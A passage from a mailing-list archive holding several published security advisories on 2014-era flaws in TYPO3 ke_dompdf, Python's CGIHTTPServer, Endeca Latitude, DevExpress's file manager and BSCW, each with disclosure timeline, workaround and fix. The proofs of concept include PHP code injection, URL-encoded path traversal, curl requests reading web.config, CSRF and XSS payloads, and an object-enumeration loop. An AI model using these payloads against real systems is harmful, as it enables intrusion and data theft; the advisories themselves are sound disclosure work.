security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps

[FD] [RT-SA-2014-007] Remote Code Execution in TYPO3 Extension ke_dompdf

2014-12-01 Thread RedTeam Pentesting GmbH
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf

During a penetration test RedTeam Pentesting discovered a remote code
execution vulnerability in the TYPO3 extension ke_dompdf, which allows
attackers to execute arbitrary PHP commands in the context of the
webserver. 


Details
===

Product: ke_dompdf TYPO3 extension
Affected Versions: 0.0.3=
Fixed Versions: 0.0.5
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007
Advisory Status: published
CVE: CVE-2014-6235
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235


Introduction


DomPDF library and a small pi1 to show how to use DomPDF to render the
current typo3-page to pdf.
(taken from the extension's description)


More Details


The TYPO3 extension ke_dompdf contains a version of the dompdf library
including all files originally supplied with it. This includes an
examples page, which contains different examples for HTML-entities
rendered as a PDF.  This page also allows users to enter their own HTML
code into a text box to be rendered by the webserver using dompdf.
dompdf also supports rendering of PHP files and the examples page also
accepts PHP code tags, which are then executed and rendered into a PDF
on the server.

Since those files are not protected in the TYPO3 extension directory,
anyone can access this URL and execute arbitrary PHP code on the system.
This behaviour was already fixed in the dompdf library, but the typo3
extension ke_dompdf supplies an old version of the library that still
allows the execution of arbitrary PHP code.


Proof of Concept


Access examples.php on the vulnerable system:
http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php

Enter PHP code in the text box on the bottom of the page and click the
submit button, for example:


?php phpinfo() ?


The page will return a PDF file containing the output of the PHP code.


Workaround
==

Remove the directory www containing the examples.php file or at least
the examples.php file from the extensions' directory.


Fix
===

Update to version 0.0.5 of the extension.


Security Risk
=

high


Timeline


2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-06 CVE number requested
2014-05-10 CVE number assigned
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-09-02 Vendor released fixed version [2]
2014-12-01 Advisory released


References
==

The TYPO3 extension ke_dompdf contains an old version of the dompdf
library, which contains an example file that can be used to execute
arbitrary commands.  This vulnerability was fixed in dompdf in 2010. The
relevant change can be found in the github repository of dompdf:

[1] https://github.com/dompdf/dompdf/commit/
e75929ac6393653a56e84dffc9eac1ce3fb90216

TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:

[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/
typo3-ext-sa-2014-010/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution

2014-06-26 Thread RedTeam Pentesting GmbH
 (%r) %
scriptname)
return
[...]
[...]

For HTTP GET requests, do_GET() first invokes send_head(). That method
calls is_cgi() to determine whether the requested path is to be executed
as a CGI script. The is_cgi() method uses _url_collapse_path() to
normalize the path, i.e. remove extraneous slashes (/),current directory
(.), or parent directory (..) elements, taking care not to permit
directory traversal below the document root. The is_cgi() function
returns True when the first path element is contained in the
cgi_directories list. As _url_collaps_path() and is_cgi() never URL
decode the path, replacing the forward slash after the CGI directory in
the URL to a CGI script with the URL encoded variant %2f leads to
is_cgi() returning False. This will make CGIHTTPRequestHandler's
send_head() then invoke its parent's send_head() method which translates
the URL path to a file system path using the translate_path() method and
then outputs the file's contents raw. As translate_path() URL decodes
the path, this then succeeds and discloses the CGI script's file
contents:

$ curl http://localhost:8000/cgi-bin%2ftest.py
#!/usr/bin/env python2
import json
import sys

db_credentials = SECRET
sys.stdout.write(Content-type: text/json\r\n\r\n)
sys.stdout.write(json.dumps({text: This is a Test}))

Similarly, the CGIHTTPRequestHandler can be tricked into executing CGI
scripts that would normally not be executable. The class normally only
allows executing CGI scripts that are direct children of one of the
directories listed in cgi_directories. Furthermore, only direct
subdirectories of the document root (the current working directory) can
be valid CGI directories.

This can be seen in the following example. Even though the sample server
shown above includes /cgi-bin/subdir as part of the request handler's
cgi_directories, a CGI script named test.py in that directory is not
executed:

$ curl http://localhost:8000/cgi-bin/subdir/test.py
[...]
pError code 403.
pMessage: CGI script is not a plain file ('/cgi-bin/subdir').
[...]

Here, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and
returned True. Next, run_cgi() further dissected these paths to perform
some sanity checks, thereby mistakenly assuming subdir to be the
executable script's filename and test.py to be path info. As subdir is
not an executable file, run_cgi() returns an error message. However, if
the forward slash between subdir and test.py is replaced with %2f,
invoking the script succeeds:

$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py
{text: This is a Test}

This is because neither is_cgi() nor run_cgi() URL decode the path
during processing until run_cgi() tries to determine whether the target
script is an executable file. More specifically, as subdir%2ftest.py
does not contain a forward slash, it is not split into the script name
subdir and path info test.py, as in the previous example.

Similarly, using URL encoded forward slashes, executables outside of a
CGI directory can be executed:

$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py
{text: This is a Test}


Workaround
==

Subclass CGIHTTPRequestHandler and override the is_cgi() method  with a
variant that first URL decodes the supplied path, for example:

class FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):
def is_cgi(self):
self.path = urllib.unquote(self.path)
return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)


Fix
===

Update to the latest Python version from the Mercurial repository at
http://hg.python.org/cpython/


Security Risk
=

The vulnerability can be used to gain access to the contents of CGI
binaries or the source code of CGI scripts. This may reveal sensitve
information, for example access credentials. This can greatly help
attackers in mounting further attacks and is therefore considered to
pose a high risk. Furthermore attackers may be able to execute code that
was not intended to be executed. However, this is limited to files
stored in the server's working directory or in its subdirectories.

The CGIHTTPServer code does contain this warning:
SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL
Even when used on a local computer this may allow other local users to
execute code in the context of another user.


Timeline


2014-04-07 Vulnerability identified
2014-06-11 Customer approved disclosure to vendor
2014-06-11 Vendor notified
2014-06-15 Vendor disclosed vulnerability in their public bug tracker
   and addressed it in public source code repository
2014-06-23 CVE number requested
2014-06-25 CVE number assigned
2014-06-26 Advisory released


References
==

http://bugs.python.org/issue21766


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks

[FD] [RT-SA-2013-002] Endeca Latitude Cross-Site Request Forgery

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Request Forgery

RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF)
vulnerability in Endeca Latitude. Using this vulnerability, an attacker
might be able to change several different settings of the Endeca
Latitude instance or disable it entirely.


Details
===

Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-002
Advisory Status: published
CVE:  CVE-2014-2399
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2399


Introduction


Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.

(from the vendor's homepage)


More Details


Endeca Latitude offers administrators the ability to perform different
administrative and configuration operations by accessing URLs.
These URLs are not secured by a randomly generated token and therefore
are prone to Cross-Site Request Forgery attacks.

For example by accessing the URL http://example.com/admin?op=exit an
administrator can shut down the Endeca Latitude instance. Several other
URLs exist (as documented at [1] and [2]) which can be used to trigger
operations such as flushing cashes or changing the logging settings.


Proof of Concept


An attacker might prepare a website, which can trigger arbitrary
functionality (see [1] and [2]) of an Endeca Latitude instance if
someone opens the attacker's website in a browser that can reach Endeca
Latitude.  An easy way to implement this is to embed a hidden image into
an arbitrary website which uses the corresponding URL as its source:

img src=http://example.com/admin?op=exit; style=display:hidden /
img src=http://example.com/config?op=log-disable; style=display:hidden /
[...]


Workaround
==

The vendor did not update the vulnerable software, but recommends to
configure all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.


Fix
===

Not available. The vendor did not update the vulnerable software to
remedy this issue.


Security Risk
=

The vulnerability can enable attackers to be able to interact with an
Endeca Latitude instance in different ways. Possible attacks include the
changing of settings as well as denying service by shutting down a
running instance. Attackers mainly benefit from this vulnerability if
the instance is not already available to them, but for example only to
restricted IP addresses or after authentication. Since this makes it
harder to identify potential target systems and the attack mainly allows
to disturb the service until it is re-started, the risk of this
vulnerability is considered to be low.


Timeline


2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
   CPU
2014-03-13 Vendor responded with additional information about a
   potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
   information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released


References
==

[1] 
http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20administrative%20operations
[2] 
http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20supported%20logging%20variables


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany

[FD] [RT-SA-2013-003] Endeca Latitude Cross-Site Scripting

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Scripting

RedTeam Pentesting discovered a Cross-Site Scripting (XSS)
vulnerability in Endeca Latitude. By exploiting this vulnerability an
attacker is able to execute arbitrary JavaScript code in the context
of other Endeca Latitude users.


Details
===

Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-003
Advisory Status: published
CVE:  CVE-2014-2400
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2400


Introduction


Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.

(from the vendor's homepage)


More Details


Endeca Latitude offers administrators to trigger different functions by
using the following two URLs (see [1]):

 * http://example.com/config?op=supported-operation
 * http://example.com/admin?op=supported-operation

When accessing such an URL which uses an invalid value for the HTTP GET
parameter op, such as
http://example.com/config?op=RedTeam%20Pentesting, an error message is
shown by the webapplication and the invalid value is directly embedded
into the document without prior escaping, which leads to a Cross-Site
Scripting vulnerability.


Proof of Concept


As shown by the following URL, an attacker is able to embed arbitrary
JavaScript code into the context of the Endeca Latitude instance:

http://example.com/config?op=scriptalert('RedTeam Pentesting');/script


Workaround
==

The vendor did not update the vulnerable software, but recommends to
configure all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.


Fix
===

Not available. The vendor did not update the vulnerable software to
remedy this issue.


Security Risk
=

The vulnerability can be used to embed arbitrary JavaScript code and
therefore offers a wide range of possible attacks such as stealing
cookies or displaying a fake login form. Furthermore, an attacker can use
this vulnerability to control the Endeca Latitude instance by using the
API implemented by its web service (see [2]). The risk of this
vulnerability is therefore considered to be high.


Timeline


2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
   CPU
2014-03-13 Vendor responded with additional information about a
   potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
   information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released



References
==

[1] 
http://docs.oracle.com/cd/E29220_01/mdex.222/admin/src/cadm_url_about_admin_urls.html
[2] http://docs.oracle.com/cd/E29220_01/index.htm


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager

2014-06-05 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal in DevExpress ASP.NET File Manager

During a penetration test RedTeam Pentesting discovered a directory
traversal vulnerability in DevExpress' ASP.NET File Manager and File
Upload. Attackers are able to read arbitrary files by specifying a
relative path.

Details
===

Product: DevExpress ASPxFileManager Control for WebForms and MVC
Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8
Fixed Versions: DevExpress ASPxFileManager v13.2.9
Vulnerability Type: Directory Traversal
Security Risk: high
Vendor URL:
https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006
Advisory Status: published
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575


Introduction


The DevExpress ASP.NET Subscription includes a standalone Multi-File
Upload Manager for WebForms and MVC and a pre-built File Manager for
WebForms; built so you can instantly introduce file management
capabilities in your next web application.

(from DevExpress' Homepage)


More Details


The ASPX File Manager component is prone to a directory traversal
vulnerability. Attackers with access to the File Manager component can
read arbitrary files on the same partition as the shared directory.

A common request to download a file via the File Manager component
requires multiple HTTP-Post parameters:

__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1
__EVENTARGUMENT=13%7Cfile.ext
__EVENTVALID=

The parameter __EVENTARGUMENT=13|file.ext specifies a file download
and the file which is to be downloaded. Attackers may also request files
outside of the shared directory by prepending a relative path to a
parent directory.


Proof of Concept


By requesting files with a relative path, files otherwise not available
will be accessible through the File Manager component.  Depending on the
shared directory and the webserver configuration, the webserver
configuration file might for example be accessible through the File
Manager component:

__EVENTARGUMENT=13|../../web.config

Other sensitive operating system files could be affected, too.

Example exploit:

curl --data __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\
__EVENTARGUMENT=13%7C../../web.config=__EVENTVALID \
http://example.com/FileManagerComponent.aspx


The request above will download the specified file.


Workaround
==

Instead of a physical file system provider, a database file system
provider with limited access permissions could be used.


Fix
===

Update ASPxFileManager control to DevExpress libraries version v13.2.9.


Security Risk
=

The risk is estimated to be high. This vulnerability allows attackers to
access arbitrary files on the same partition as the File Manager's root
directory. This may allow attackers to read sensitive information like
the webserver configuration.


Timeline


2014-03-10 Vulnerability identified
2014-03-21 Customer approved disclosure to vendor
2014-03-21 CVE number requested and assigned
2014-03-25 Vendor notified
2014-04-11 Customer opened support ticket with vendor
2014-04-17 Vendor released fixed version
2014-04-17 Vendor released security advisory to customers
2014-06-05 Advisory released


References
==

Vendor Security Advisory:
http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW

2014-05-08 Thread RedTeam Pentesting GmbH
Advisory: Metadata Information Disclosure in OrbiTeam BSCW

RedTeam Pentesting discovered an information disclosure vulnerability in
OrbiTeam's BSCW collaboration software. An unauthenticated attacker can
disclose metadata about internal objects which are stored in BSCW.


Details
===

Product: BSCW
Affected Versions: BSCW =5.0.7
Fixed Versions: BSCW =5.0.8
Vulnerability Type: Information Disclosure
Security Risk: medium
Vendor URL: http://www.bscw.de/english/product.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003
Advisory Status: published
CVE: CVE-2014-2301
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301


Introduction


The BSCW shared workspace system is the tool of choice for efficient
group collaboration. BSCW permits the creation of documents,
appointments, contacts, tasks and notes within shared workspaces.
Without having to install additional software, team members can access
this data around-the-clock, from anywhere in the world. Mission-critical
information is constantly available to all authorised personnel
regardless of location, ensuring that complex workflows can be
coordinated with minimal effort.

(from OrbiTeam's homepage)


More Details


BSCW uses the URL parameter op to select different functions of the
application. For example the password reset dialog can be used by
opening the following URL:

https://www.example.com/pub/bscw.cgi/?op=chpwd

The server maps the value provided by the parameter op to locally
stored python modules which provide handler functions that are called to
generate HTTP responses. It was discovered that sensitive metadata about
internally stored objects of BSCW can be disclosed by using the inf
operation.

When opening the following URL, the filename of a document which
is identified by the value 12345 is disclosed in the response
sent by the server (output shortened):

$ curl --header 'Cookie: _pub_bscws=e4efb9e7ace7a12de82aa7a4aff1ab2a:1' \
 http://www.example.com/pub/bscw.cgi/12345?op=inf;
[...]
table summary= class=iTab border=0 cellspacing=1 cellpadding=4 
width=440
tr valign=top
  td class=iLabel  id=small  width=88Name/td
  td class=iValueB width=352Contract-X.doc/td
/tr
/table
[...]

The cookie used in the above command is generated by requesting the
login page of BSCW. It is not necessary to enter credentials.

By iterating over the ids which are assigned in ascending order,
attackers can enumerate the names of all objects stored in BSCW without
prior authentication. This includes filenames and email addresses.


Proof of Concept


When the following loop is run with a valid (but unauthenticated) BSCW
cookie, it will find names for the BSCW objects 1 to 3:

$ for id in `seq 1 3`; do
 filename = `curl --silent --header 'Cookie: 
_pub_bscws=COOKIE_COOKIE_COOKIE' \
http://www.example.com/pub/bscw.cgi/${id}?op=inf; | \
grep iValueB | \
sed -e 's;^.*td class=iValueB 
width=352\(.*\)/td.*$;\1;'`
 echo ${id}: ${filename}
done


Workaround
==

It may be possible to add another authentication layer, for example
HTTP-Authentication, to limit access to this BSCW information disclosure
to persons authorized to use BSCW anyway.


Fix
===

Update to version 5.0.8.


Security Risk
=

The risk is estimated to be medium. This vulnerability does not allow
attackers to access files stored in BSCW. They can however retrieve
filenames, which may be enough to draw conclusions about the
corresponding file contents, and other potentially sensitive data such
as email addresses.


Timeline


2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-04-22 Vendor released fixed version
2014-05-08 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital